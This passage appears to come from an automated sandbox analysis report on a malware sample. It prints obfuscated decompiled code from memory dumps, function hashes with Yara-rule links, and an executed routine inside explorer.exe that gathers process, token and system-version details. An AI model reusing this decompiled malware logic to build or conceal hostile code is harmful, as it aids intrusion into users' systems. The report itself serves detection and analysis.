						_v12 = _v12 & 0x00000000;
						_push(_v12);
						_v32 = _v32 ^ _t484;
						if( *(_t471 + 0x45cfd4) == 0) {
							_v12 = 0;
							_v36 = _v36 | _t386;
							_v16 = _v16 & 0x00000000;
							 *_t568 =  *_t568 + _t484;
							_v44 =  *((intOrPtr*)(_t471 + 0x45c8f0));
							_t560 = _t560;
							_t396 =  *((intOrPtr*)(_t471 + 0x45d6f0))(_v16, _v12);
							 *(_t471 + 0x45cfd4) = _t396;
							 *_t312 = _t484;
							_t484 = (_t484 & 0x00000000) + _v16;
							_t386 = _t396 & 0x00000000 ^  *_t568;
							_t568 =  &(_t568[1]);
						}
						_v12 = 0;
						_push(_v12);
						_v36 = _v36 ^ _t484;
						if( *((intOrPtr*)(_t471 + 0x45cadc)) == 0) {
							 *_t568 =  *_t568 - _t533;
							 *_t568 =  *_t568 ^ _t386;
							_t394 = _t471 + 0x45c7a0;
							_v16 = _v16 & 0x00000000;
							_v44 = _v44 + _t394;
							 *_t394 = 0x30;
							_v48 =  *((intOrPtr*)(_t471 + 0x45c290));
							 *((intOrPtr*)(_t471 + 0x45cadc)) =  *((intOrPtr*)(_t471 + 0x45d6f4))(_t513, _v16, _t533);
							 *_t325 = _t513;
							_t386 = _v12;
						}
						_t514 = _t386;
						if( *(_t471 + 0x45c8a8) == 0) {
							_v12 = 0;
							 *_t568 =  *_t568 ^ _t514;
							_v44 =  *((intOrPtr*)(_t471 + 0x45cb58));
							_t386 =  *((intOrPtr*)(_t471 + 0x45d6f0))(_v12);
							 *(_t471 + 0x45c8a8) = _t386;
							 *_t334 = _t547;
							_t514 = _v12;
						}
						_t550 = _a8;
						if( *(_t471 + 0x45d1b0) == 0) {
							 *_t568 =  *_t568 - _t484;
							 *_t568 =  *_t568 + _t514;
							_t386 =  *((intOrPtr*)(_t471 + 0x45d648))();
							 *(_t471 + 0x45d1b0) = _t386;
							 *_t340 = _t484;
							_t514 = _v16;
						}
						_t485 = _v36;
						if( *(_t471 + 0x45c8cc) == 0) {
							 *_t568 =  *_t568 ^ _t471;
							 *_t568 = _t485;
							_v44 = _t514;
							_v16 = 0;
							_v48 = _v48 + _t471 + 0x45c8f8;
							_t386 =  *((intOrPtr*)(_t471 + 0x45d678))(_v16, _v16, _t471);
							 *(_t471 + 0x45c8cc) = _t386;
							_t514 = (_t514 & 0x00000000) + _v48;
							_t485 = _v44;
							_t568 =  &((_t568 - 0xfffffffc)[1]);
						}
						 *_t568 =  *_t568 - _t514;
						_t486 = _t485;
						if( *(_t471 + 0x45c2e8) == 0) {
							_v16 = _v16 & 0x00000000;
							 *_t568 =  *_t568 + _t486;
							_v12 = 0;
							_v44 = _v44 ^ _t514;
							_v48 =  *((intOrPtr*)(_t471 + 0x45d010));
							_t386 =  *((intOrPtr*)(_t471 + 0x45d6f0))(_v12, _v16);
							 *(_t471 + 0x45c2e8) = _t386;
							_t514 = _t514 & 0x00000000 | _v48;
							_t568 =  &(_t568[1]);
							 *_t359 = _t486;
							_t486 = 0 ^ _v12;
						}
						 *_t568 =  *_t568 | _t471;
						_t472 = _t550;
						_t551 = _t472 + _t486;
						_t474 = 0;
						if( *(_t474 + 0x45c65c) == 0) {
							_v12 = 0;
							 *_t568 =  *_t568 ^ _t514;
							_t386 =  *((intOrPtr*)(_t474 + 0x45d648))(_v12);
							 *(_t474 + 0x45c65c) = _t386;
							_t514 =  *_t568;
							_t568 =  &(_t568[1]);
						}
						_t487 =  *(_t533 + 8);
						if( *((intOrPtr*)(_t474 + 0x45c304)) == 0) {
							 *_t568 =  *_t568 & 0x00000000;
							 *_t568 =  *_t568 ^ _t487;
							_v44 = _v44 & 0x00000000;
							_v44 = _v44 + _t514;
							_t368 = _t474 + 0x45c9e8; // 0x45c9e8
							_t389 = _t368;
							_v12 = 0;
							_v48 = _v48 ^ _t389;
							 *_t389 = 0x30;
							_v52 =  *((intOrPtr*)(_t474 + 0x45ccf0));
							 *((intOrPtr*)(_t474 + 0x45c304)) =  *((intOrPtr*)(_t474 + 0x45d6f4))(_v12, _t474, _t386);
							 *_t375 = _t389;
							_t514 = _t514 & 0x00000000 | _v16;
							 *_t377 = _t514;
							_t487 = 0 ^ _v16;
						}
						memcpy(_t533, _t551, _t487);
						_t552 = _a8;
						_push(0 ^ _v36);
						_v36 = _v36 - _t514;
						_pop(_t491);
						memcpy(_t551 + _t487 + _t487, _t552, _t491);
						_t494 = _v32;
						_t547 = _t552 & 0x00000000 ^ _v28;
						_t385 = memcpy(_a8, _t547, _t494);
						_t568 =  &(( &(_t568[7]))[3]);
						_t530 = _t547 + _t494 + _t494;
					}
					_pop( *_t381);
					return _t385;
				} else {
					if( *((intOrPtr*)(_t465 + 0x45c284)) == 0) {
						 *_t566 =  *_t566 - _t475;
						 *_t566 =  *_t566 | _t465 + 0x0045d380;
						 *((intOrPtr*)(_t465 + 0x45c284)) =  *((intOrPtr*)(_t465 + 0x45d678))(_t475);
					}
					_t454 = _t465 + 0x45c804;
					if( *(_t465 + 0x45c8dc) == 0) {
						 *_t566 =  *_t566 & 0x00000000;
						 *_t566 =  *_t566 ^ _t454;
						 *_t566 = _t465 + 0x45cfcc;
						_t461 =  *((intOrPtr*)(_t465 + 0x45d674))(_v16, _t525);
						 *(_t465 + 0x45c8dc) = _t461;
						_pop( *_t15);
						_t454 = _t461 & 0x00000000 | _v16;
					}
					_push(_t544);
					 *_t566 =  *_t566 & 0x00000000;
					 *_t566 =  *_t566 + _t454;
					if( *((intOrPtr*)(_t465 + 0x45c6d0)) == 0) {
						 *_t566 =  *_t566 - _t560;
						 *_t566 =  *_t566 + _t465 + 0x45c668;
						 *((intOrPtr*)(_t465 + 0x45c6d0)) =  *((intOrPtr*)(_t465 + 0x45d678))(_t560);
					}
					_t383 =  *((intOrPtr*)(_t465 + 0x45d678))();
					if( *(_t465 + 0x45c294) == 0) {
						_v12 = _v12 & 0x00000000;
						 *_t566 =  *_t566 ^ _t383;
						_t455 = _t465 + 0x45d3f8;
						_v28 = _v28 & 0x00000000;
						_v28 = _v28 + _t455;
						 *_t455 = 0x30;
						_t456 =  *((intOrPtr*)(_t465 + 0x45d6f4))(0, _t511, _v12);
						 *(_t465 + 0x45c294) = _t456;
						_t383 = _t456 & 0x00000000 | _v32;
						_t566 = _t566 - 0xfffffffc;
					}
					 *(_t465 + 0x45c5a0) = _t383;
					if( *(_t465 + 0x45cd30) == 0) {
						_t383 =  *((intOrPtr*)(_t465 + 0x45d64c))();
						 *(_t465 + 0x45cd30) = _t383;
					}
					goto L13;
				}
			}

0x01053943
0x01053943
0x01053943
0x01053943
0x01053943
0x01053943
0x01053943
0x01053944
0x01053947
0x0105394a
0x0105394c
0x01053956
0x01053958
0x0105395e
0x0105395e
0x0105396b
0x01053a5a
0x01053a5a
0x01053a61
0x01053a64
0x01053a6e
0x01053a70
0x01053a76
0x01053a76
0x01053a83
0x01053a90
0x01053a98
0x01053a98
0x01053a9e
0x01053aab
0x01053aae
0x01053ab2
0x01053abb
0x01053ac5
0x01053ace
0x01053ada
0x01053add
0x01053add
0x01053ae0
0x01053ae7
0x01053aea
0x01053af4
0x01053af7
0x01053afb
0x01053b05
0x01053b05
0x01053b08
0x01053b0e
0x01053b1a
0x01053b1d
0x01053b1d
0x01053b20
0x01053b2d
0x01053b35
0x01053b35
0x01053b3b
0x01053b43
0x01053b47
0x01053b4f
0x01053b58
0x01053b5c
0x01053b65
0x01053b65
0x01053b6b
0x01053b78
0x01053b7b
0x01053b7e
0x01053b89
0x01053b8d
0x01053b94
0x01053b9c
0x01053b9f
0x01053b9f
0x01053ba2
0x01053baf
0x01053bb1
0x01053bb7
0x01053bb7
0x01053baf
0x01053bbd
0x01053bc4
0x01053bc7
0x01053bd1
0x01053bdc
0x01053bdf
0x01053be5
0x01053be5
0x01053bf2
0x01053bff
0x01053c09
0x01053c14
0x01053c14
0x01053c1a
0x01053c27
0x01053c29
0x01053c33
0x01053c3e
0x01053c49
0x01053c51
0x01053c54
0x01053c54
0x01053c57
0x01053c64
0x01053c6d
0x01053c70
0x01053c76
0x01053c76
0x01053c64
0x01053c7c
0x01053c86
0x01053c88
0x01053c8e
0x01053c8e
0x01053c9b
0x01053ca8
0x01053caa
0x01053cb3
0x01053cb6
0x01053cc3
0x01053cc3
0x01053ccc
0x01053ccc
0x01053cd2
0x01053cdf
0x01053ce2
0x01053ce6
0x01053ce9
0x01053cf0
0x01053cf3
0x01053cf6
0x01053d04
0x01053d0c
0x01053d0f
0x01053d0f
0x01053d12
0x01053d15
0x01053d1f
0x01053d28
0x01053d28
0x01053d31
0x01053d31
0x01053d37
0x01053d44
0x01053d49
0x01053d4c
0x01053d52
0x01053d5e
0x01053d61
0x01053d61
0x01053d64
0x01053d71
0x01053d73
0x01053d79
0x01053d79
0x01053d71
0x01053d7f
0x01053d89
0x01053d91
0x01053d9b
0x01053d9e
0x01053da4
0x01053da4
0x01053db1
0x01053dba
0x01053dbc
0x01053dc3
0x01053dc7
0x01053dca
0x01053dd8
0x01053ddc
0x01053de3
0x01053de3
0x01053def
0x01053df6
0x01053df9
0x01053dff
0x01053dff
0x01053e05
0x01053e0a
0x01053e0e
0x01053e16
0x01053e18
0x01053e1e
0x01053e1e
0x01053e24
0x01053e25
0x01053e28
0x01053e32
0x01053e3a
0x01053e44
0x01053e47
0x01053e4d
0x01053e4d
0x01053e53
0x01053e60
0x01053e63
0x01053e67
0x01053e71
0x01053e74
0x01053e7a
0x01053e82
0x01053e85
0x01053e85
0x01053e91
0x01053e93
0x01053e9b
0x01053ea0
0x01053eaa
0x01053ead
0x01053eb0
0x01053eb6
0x01053ec2
0x01053ec5
0x01053ec5
0x01053ec8
0x01053ec9
0x01053ecc
0x01053ed6
0x01053edb
0x01053ee4
0x01053eee
0x01053ef7
0x01053f03
0x01053f06
0x01053f06
0x01053f09
0x01053f0b
0x01053f14
0x01053f1c
0x01053f1e
0x01053f25
0x01053f29
0x01053f36
0x01053f3e
0x01053f41
0x01053f41
0x01053f44
0x01053f44
0x01053f4c
0x01053f4e
0x01053f58
0x01053f61
0x01053f69
0x01053f6c
0x01053f6c
0x01053f6f
0x01053f6f
0x01053f79
0x01053f82
0x01053f85
0x01053f8e
0x01053f8e
0x01053f96
0x01053f99
0x01053fa3
0x01053fa8
0x01053fab
0x01053fb1
0x01053fbb
0x01053fbe
0x01053fcc
0x01053fd0
0x01053fd7
0x01053fdd
0x01053fe0
0x01053fe0
0x01053fe9
0x01053fec
0x01053ff6
0x01053ff9
0x01053ffc
0x01054005
0x01054011
0x01054014
0x01054014
0x01054017
0x01054019
0x0105401a
0x0105401e
0x01054021
0x01054021
0x01054024
0x01054027
0x00000000
0x00000000
0x0105402e
0x01054030
0x01054037
0x01054037
0x01054039
0x0105403b
0x0105403d
0x0105403f
0x0105403f
0x0105403f
0x01054044
0x01054046
0x01054046
0x01054047
0x01054047
0x01054050
0x01054053
0x0105405d
0x0105405f
0x01054065
0x0105406c
0x0105406f
0x0105407d
0x01054081
0x01054082
0x01054088
0x01054088
0x01054092
0x0105409f
0x010540a1
0x010540a7
0x010540a7
0x010540b1
0x010540be
0x010540c6
0x010540d0
0x010540d9
0x010540d9
0x010540df
0x010540e4
0x010540e8
0x010540f0
0x010540f8
0x010540ff
0x01054108
0x01054108
0x0105410e
0x01054112
0x01054112
0x0105411c
0x01054127
0x01054130
0x01054130
0x01054136
0x01054142
0x01054144
0x0105414a
0x01054154
0x01054157
0x0105415f
0x01054165
0x01054165
0x01054142
0x010540b1
0x0105416d
0x01054170
0x0105417a
0x0105417d
0x01054180
0x01054184
0x01054188
0x0105418b
0x01054191
0x01054199
0x0105419c
0x0105419c
0x010541a2
0x010541af
0x010541b8
0x010541bc
0x010541c5
0x010541c5
0x010541cb
0x010541d5
0x010541dd
0x010541dd
0x010541e3
0x010541e4
0x010541e8
0x010541f2
0x010541fa
0x010541fa
0x01054200
0x0105420a
0x0105420c
0x01054213
0x0105421e
0x01054222
0x01054229
0x01054235
0x01054238
0x01054238
0x0105423b
0x01054245
0x01054248
0x0105424c
0x01054252
0x0105425b
0x01054267
0x0105426a
0x0105426d
0x01054270
0x01054270
0x01054273
0x01054277
0x0105427a
0x01054284
0x01054286
0x01054290
0x01054293
0x0105429a
0x010542a5
0x010542a9
0x010542aa
0x010542b0
0x010542bc
0x010542bf
0x010542c8
0x010542cb
0x010542cb
0x010542ce
0x010542d5
0x010542d8
0x010542e2
0x010542e5
0x010542e8
0x010542eb
0x010542f1
0x010542f8
0x010542fb
0x01054309
0x01054314
0x0105431a
0x0105431d
0x0105431d
0x01054320
0x01054329
0x0105432b
0x01054335
0x0105433f
0x01054342
0x01054348
0x0105434e
0x01054351
0x01054351
0x01054354
0x0105435e
0x01054361
0x01054364
0x01054367
0x0105436d
0x01054373
0x01054376
0x01054376
0x01054379
0x01054383
0x01054386
0x01054389
0x0105438f
0x01054398
0x010543a2
0x010543a5
0x010543ab
0x010543b7
0x010543bf
0x010543c2
0x010543c2
0x010543c6
0x010543c9
0x010543d1
0x010543d3
0x010543da
0x010543dd
0x010543e7
0x010543f1
0x010543f4
0x010543fa
0x01054406
0x01054409
0x0105440e
0x01054411
0x01054411
0x01054416
0x0105441a
0x0105441d
0x0105441f
0x01054427
0x01054429
0x01054433
0x01054436
0x0105443c
0x01054444
0x01054447
0x01054447
0x0105444a
0x01054454
0x01054457
0x0105445b
0x0105445f
0x01054463
0x01054466
0x01054466
0x0105446c
0x01054476
0x01054479
0x01054487
0x01054492
0x0105449e
0x010544a1
0x010544a6
0x010544a9
0x010544a9
0x010544ac
0x010544ae
0x010544b9
0x010544ba
0x010544bd
0x010544be
0x010544c5
0x010544d1
0x010544d7
0x010544d7
0x010544d7
0x010544d7
0x010544eb
0x010544f2
0x01053971
0x01053978
0x01053981
0x01053984
0x0105398d
0x0105398d
0x01053993
0x010539a0
0x010539a3
0x010539a7
0x010539b3
0x010539b6
0x010539bc
0x010539c8
0x010539cb
0x010539cb
0x010539ce
0x010539cf
0x010539d3
0x010539dd
0x010539e6
0x010539e9
0x010539f2
0x010539f2
0x010539f8
0x01053a05
0x01053a07
0x01053a0e
0x01053a11
0x01053a18
0x01053a1c
0x01053a1f
0x01053a27
0x01053a2d
0x01053a39
0x01053a3c
0x01053a3c
0x01053a3f
0x01053a4c
0x01053a4e
0x01053a54
0x01053a54
0x00000000
0x01053a4c

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf3d547dbe44e20b1871a09a4d58c6e124589937cdefa055cd137941383992b2
Instruction ID: 118afcb71e111dec33b2dec41c11b0fa9f949010a79736450174dfa76f0c9836
Opcode Fuzzy Hash: bf3d547dbe44e20b1871a09a4d58c6e124589937cdefa055cd137941383992b2
Instruction Fuzzy Hash: BE820071804708EFEB55AF64C4C9769BBF0FF04316F0985A9DC899E28AD33855A4CF29

Uniqueness

Uniqueness Score: -1.00%

Function 01053000, Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03f18855c5d3adc1bb8e9ac374c0f2e58e3eec8c5e6e964746205904026ce7b6
Instruction ID: 8f2c7d5130ea9c22cf673a5de648441b705b02d382a164bba48eddc899ec3f97
Opcode Fuzzy Hash: 03f18855c5d3adc1bb8e9ac374c0f2e58e3eec8c5e6e964746205904026ce7b6
Instruction Fuzzy Hash: 0D32BE70804208CFEF61AFA4C4C9769BBF0BF08316F0845A9DC899E24BD77855A5CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01053271, Relevance: .3, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f2a195b09faee2699a523470f00ba572a58cb65ab108fa282b2fbb77bef6b5b
Instruction ID: 1f7394b1ec923087f328029c03fbb1ef3de5b8399d4fb7bbc4e6e6af4416f2a1
Opcode Fuzzy Hash: 5f2a195b09faee2699a523470f00ba572a58cb65ab108fa282b2fbb77bef6b5b
Instruction Fuzzy Hash: A7F1BD70805608CFEF61AFA4C5C8769BBF0FF08316F0845A9DC899E24BD77855A5CB29

Uniqueness

Uniqueness Score: -1.00%

Function 01056BEE, Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdbd87c47a1e3cdf18b58fcd7abb87791966de902db9e315e1caf160de66ad65
Instruction ID: b6b099ab158e7961010687b0e6bc356ab0f5d4d614189afe86cab51bc586e2fa
Opcode Fuzzy Hash: bdbd87c47a1e3cdf18b58fcd7abb87791966de902db9e315e1caf160de66ad65
Instruction Fuzzy Hash: ECD1F170804308EFEB54AF64C5C9769BBF0FF04312F5944A9DC899A24BD7751AA0DF2A

Uniqueness

Uniqueness Score: -1.00%

Function 01058B55, Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 937282a03a79337fd210d2a432449fedc474262c488285bcfe2fec544366cc8b
Instruction ID: 2a05a74a0eeffbe244ff52cc85c0f0b6b3d4e49aa462db346e5b290ae0c51769
Opcode Fuzzy Hash: 937282a03a79337fd210d2a432449fedc474262c488285bcfe2fec544366cc8b
Instruction Fuzzy Hash: 81D10171804608EFEF54AF64C4C976ABBF0FF04316F0945ADDC899A24AD77855A0CF29

Uniqueness

Uniqueness Score: -1.00%

Function 01059A7C, Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e1eb9a28c3a64d9881b5ff161afc4ca282d83f3a6d9e21cdc449fd25a14dae6
Instruction ID: 5bfd1d1b3c3ce79dd99aec2df5ff515381555c0deb46870e033f380205f83cca
Opcode Fuzzy Hash: 6e1eb9a28c3a64d9881b5ff161afc4ca282d83f3a6d9e21cdc449fd25a14dae6
Instruction Fuzzy Hash: 2781E171804608DFEF549FA4C4C976ABBF0FF0431AF0545ADDC9A9A28AD73451A4CF29

Uniqueness

Uniqueness Score: -1.00%

Function 010535CD, Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38328358de9d7732461fa4291ff18fbe943951fb1a0ab813c7c9d1af99512d73
Instruction ID: 8a305dce284e36347113ab0f7f8567fdad8e856992593bf1e99bfe61563f1f71
Opcode Fuzzy Hash: 38328358de9d7732461fa4291ff18fbe943951fb1a0ab813c7c9d1af99512d73
Instruction Fuzzy Hash: AA81E270804208CFEF619F64C4C83A9BBF1FF48316F1885A9DC89AA14AD77415A5CF69

Uniqueness

Uniqueness Score: -1.00%

Function 01054795, Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3393607c8d3aea3214141a88580f845dfd262758852c9ebb9c630bf6a5edc302
Instruction ID: f1114caaf33caa1f93658c43f4cc79fe32272d0ba8469a0522b138eae94d700b
Opcode Fuzzy Hash: 3393607c8d3aea3214141a88580f845dfd262758852c9ebb9c630bf6a5edc302
Instruction Fuzzy Hash: 01417F32D00504EFDB00DF98D981B9DFBB1FF84334F2942A8C894A7285D774AAA5DB95

Uniqueness

Uniqueness Score: -1.00%

Function 01058DF9, Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbbc347e5ecf6caeae42d7428d05806d0d600fc912957329738935709f1bb224
Instruction ID: a71814082179ffd03aa0e65d33026de5a5f1bbe9ad2531a3fbbb02201e718310
Opcode Fuzzy Hash: dbbc347e5ecf6caeae42d7428d05806d0d600fc912957329738935709f1bb224
Instruction Fuzzy Hash: 2B412971904208EFEB14AFA4D8C67AEBBF0FF04322F1544ADDC89D6242D7745690CB16

Uniqueness

Uniqueness Score: -1.00%

Function 01057A3B, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174d98db68c8b020fb50dd52a1529753447ed0084283fe994ed95f77f31ac2db
Instruction ID: db2332a93b791403d04e1775ffb7a9111ce9ec33a7f066b5ef797e9a9cd1a07b
Opcode Fuzzy Hash: 174d98db68c8b020fb50dd52a1529753447ed0084283fe994ed95f77f31ac2db
Instruction Fuzzy Hash: EB417F72800705DFEB44CE78C98939A3B70EB54372F2883AADD69DD0D6D33447519B58

Uniqueness

Uniqueness Score: -1.00%

Function 010598ED, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae2666c214d5c2e3e6b041e2207a0090c0788cf8810e4e95cb95dc81dd630ea2
Instruction ID: 6ecf54f9dc8f5ee1c68ca19d6293fce2e93a8566f2a3f22e7b90970ad2ae6fd4
Opcode Fuzzy Hash: ae2666c214d5c2e3e6b041e2207a0090c0788cf8810e4e95cb95dc81dd630ea2
Instruction Fuzzy Hash: D7419F72815605DFEB18CF38C98939A3B70FF40335F288369DC699A2D6D3758A518B94

Uniqueness

Uniqueness Score: -1.00%

Function 01054910, Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ce505077db42a61da734a6515de4df8c0885ab12462aa73c1500cc658980b35
Instruction ID: 0519ec9d4674706ba78692c68b00d2aa25d732cee40b5d99131b938158ed29aa
Opcode Fuzzy Hash: 2ce505077db42a61da734a6515de4df8c0885ab12462aa73c1500cc658980b35
Instruction Fuzzy Hash: 4A414B729107049FEB04CE68C98639A3AB1EB41336F29C36ADC299E1D6D3744A90DF94

Uniqueness

Uniqueness Score: -1.00%

Function 010568D7, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 267f021bc3b75a1814ed9c863f41fd29e9bc766deece8740cae4e4330ac419e4
Instruction ID: af53912be2b2eea04da14ef686d1f9f5dba1e309e19cd1329c74bd2fb743e57a
Opcode Fuzzy Hash: 267f021bc3b75a1814ed9c863f41fd29e9bc766deece8740cae4e4330ac419e4
Instruction Fuzzy Hash: CA415C72D10A08AFFB548E39C98939E7B70EF40331F28C36ADC699A1D6D3358A518F54

Uniqueness

Uniqueness Score: -1.00%

Function 01057F75, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9905af10d0aa57eec9985ed05232b44351f33fe8072fbfa872fb81250251f43
Instruction ID: 777f02fcc5fd5b9f5a528f4bd5059640640a7727f3024a7ac8879e3bc3b01d07
Opcode Fuzzy Hash: d9905af10d0aa57eec9985ed05232b44351f33fe8072fbfa872fb81250251f43
Instruction Fuzzy Hash: 77418D31800609AFEB44CF39CC9579A3B71EF41331F24C359AC799A2D6D7349A119F94

Uniqueness

Uniqueness Score: -1.00%

Function 01055223, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ab436ce4252cc525a39c0cf1ca96f36cc376259d54b3965bcbd2c867cb98e96
Instruction ID: 8324dd6e5246477b48543f79c7a9162fb3a1f050b8e62115556e39d3f22cdc5c
Opcode Fuzzy Hash: 1ab436ce4252cc525a39c0cf1ca96f36cc376259d54b3965bcbd2c867cb98e96
Instruction Fuzzy Hash: 0F41A673C116019FFB14CF24D98639A3760EF51336F19C3A9AC799E1CAC37885518B58

Uniqueness

Uniqueness Score: -1.00%

Function 01054F63, Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fbe77b214811a72a6f9bcbc9c25eae5b8291465502123f4be8177312e1c112c
Instruction ID: 02ab973ae31ebb2934e7c7dc5964dd3c418f51119d8011efcf889cb04d52b099
Opcode Fuzzy Hash: 6fbe77b214811a72a6f9bcbc9c25eae5b8291465502123f4be8177312e1c112c
Instruction Fuzzy Hash: A341B3328107059FEB48CF38C5CA79A7B70EF40336F24836ADC29DA0D6C77486908B98

Uniqueness

Uniqueness Score: -1.00%

Function 01054CCB, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.716530943.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c99d8fd01937360f9e6cfc16275ae0312d2fbd2e2470ac744b974e8987db57
Instruction ID: 2e1402405cb6c66819acdb6274cf5393a149df0a07a1c0b77fecc0abea370ab2
Opcode Fuzzy Hash: c2c99d8fd01937360f9e6cfc16275ae0312d2fbd2e2470ac744b974e8987db57
Instruction Fuzzy Hash: 99315C32800609AFEB54DF38C88579A3B71EB81336F24C355ECB99A0D6D3344691CB69

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exe PID: 6480 Parent PID: 7104 explorer.exeCOMMON

Executed Functions

Function 00ECF5F1, Relevance: 7.5, APIs: 5, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00ECF5F1() {
				void* __esi;
				intOrPtr _t13;
				signed int _t14;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				struct _OSVERSIONINFOA* _t25;
				intOrPtr* _t29;

				_t25 =  *0xef56a8; // 0xf00000
				_t13 = E00ECE397(_t24, GetCurrentProcess()); // executed
				 *_t29 = 0x105;
				_t1 = _t25 + 0x1644; // 0xf01644
				_t26 = _t1;
				 *((intOrPtr*)(_t25 + 0x110)) = _t13;
				_t14 = GetModuleFileNameW(0, _t1, ??);
				if(_t14 != 0) {
					 *(_t25 + 0x1854) = E00ECEAFE(_t26);
				} else {
					 *(_t25 + 0x1854) =  *(_t25 + 0x1854) & _t14;
				}
				_t6 = _t25 + 0x228; // 0xf00228
				 *((intOrPtr*)(_t25 + 0x434)) = E00ECEAFE(_t6);
				memset(_t25, 0, 0x9c);
				_t25->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t25);
				 *((intOrPtr*)(_t25 + 0x1640)) = GetCurrentProcessId();
				_t22 = E00ED71CE(_t24);
				_t9 = _t25 + 0x220; // 0xf00220
				 *((intOrPtr*)(_t25 + 0x21c)) = _t22;
				_t23 = E00ED7209(_t24, _t9); // executed
				 *((intOrPtr*)(_t25 + 0x218)) = _t23;
				return _t23;
			}

0x00ecf5f3
0x00ecf600
0x00ecf605
0x00ecf60c
0x00ecf60c
0x00ecf615
0x00ecf61b
0x00ecf623
0x00ecf634
0x00ecf625
0x00ecf625
0x00ecf625
0x00ecf63a
0x00ecf64e
0x00ecf654
0x00ecf65d
0x00ecf65f
0x00ecf66b
0x00ecf671
0x00ecf676
0x00ecf67c
0x00ecf682
0x00ecf687
0x00ecf68f

APIs

GetCurrentProcess.KERNEL32(?,?,00EC1CE0), ref: 00ECF5F9

Part of subcall function 00ECE397: OpenProcessToken.ADVAPI32(?,00000008,00000000,?,?,?,00ECF066,00000000), ref: 00ECE3A9

GetModuleFileNameW.KERNEL32(00000000,00F01644,00000000,?,?,00EC1CE0), ref: 00ECF61B
memset.MSVCRT ref: 00ECF654
GetVersionExA.KERNEL32(00F00000,00EC1CE0), ref: 00ECF65F
GetCurrentProcessId.KERNEL32 ref: 00ECF665

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: Process$Current$FileModuleNameOpenTokenVersionmemset
String ID:
API String ID: 33966338-0
Opcode ID: 301aa47a64b5876fad65720626906c2e7693ea5444dd7323a07a62d760dd16fa
Instruction ID: 49c6b254692238a0fe8b6134ca77c6a2f840a62c2f0d0aee04c456591769b7a7
Opcode Fuzzy Hash: 301aa47a64b5876fad65720626906c2e7693ea5444dd7323a07a62d760dd16fa
Instruction Fuzzy Hash: 8001B171A01A55AFC304AF72DC49BCAFBE4FF50310F00162AF118A7221EBB56556CBD0

Uniqueness

Uniqueness Score: -1.00%

